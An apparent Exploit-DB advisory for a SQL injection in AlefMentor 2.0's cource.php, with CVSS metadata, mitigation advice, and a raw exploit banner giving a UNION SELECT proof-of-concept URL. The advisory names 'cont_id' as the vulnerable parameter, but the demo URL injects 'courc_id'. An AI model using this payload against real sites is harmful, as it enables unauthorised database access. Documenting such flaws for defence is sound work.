AlefMentor 2.0 Remote SQL Injection Vulnerability

vendor:

AlefMentor

by:

Red-D3v1L

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: AlefMentor

Affected Version From: AlefMentor 2.0

Affected Version To: 5

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

AlefMentor 2.0 Remote SQL Injection Vulnerability

The vulnerability exists in AlefMentor 2.0, where an attacker can inject SQL queries through the 'cont_id' parameter in the 'cource.php' file. This can lead to unauthorized access or manipulation of the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, implementing parameterized queries or using an ORM (Object Relational Mapping) can provide protection against SQL injection attacks.

Source

Exploit-DB raw data:

      _ _ _ _  _ _ _   _ _ _ _    _ _ _    __  _ _ _ _               _____1337~h4x0rZ__   _        ___    ___
    /_/Rd_ _ /   _ _\\/   _ _ /   \\      \\<   |/_ _   /         /\\   |     \\    /\\  ||   \\( )   /\\  |  \\  (| |
    \\_ _ _ _/  /_ _ /  /      __ |  ()  / |  |  /   / [d0t]com/@~\\  | (O) /   /+~\\ ||_O_|( )  /0O\\ |   \\  | |
     _ _ _ _\\  \\_ _ \\  \\ _ _ _   |     \\  |  | /   /_ _      /|__|\\ |     \\  /|__|\\|| O |( ) /+__+\\| ^  \\ | |
   /_ _ _ _ _\\ _ _ _/\\ _ _ _ /   |__|\\__\\ |__|/_ _ _ _ _\\   /\\|  |/\\|__|\\__\\( )  ( )|___/(_)/\\|  |/\\__\\__\\|_ >
       
	   
==============================================================================
        [ª] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [ª]  AlefMentor 2.0  <== 5.0 (id) Remote SQL Injection Vulnerability
==============================================================================
    [ª] my home:              [ http://sec-r1z.com ]
    [ª] Script:                    [ AlefMentor 2.0 ]
    [ª] Language:             [ PHP ]
    [ª] Download             [ http://alefmentor.mac.findmysoft.com/ ]
    [ª] Founder:               [ ./Red-D3v1L ]
    [ª] Gr44tz to:             [ sec-r1z# Crew - Hackteach Team - my love :$ ]
    [ª] Fuck to :               [ All LamErZ And n00bz ]
########################################################################

===[ Exploit SQL ]===  

 [ª] [Path]/cource.php?action=pregled&cont_id=[SQL]

 [ª] Live dem0 : 

http://www.site.com/am/cource.php?action=pregled&cont_id=21&courc_id=-2+union+select+version%28%29--


Author: Red-D3v1L <-

###########################################################################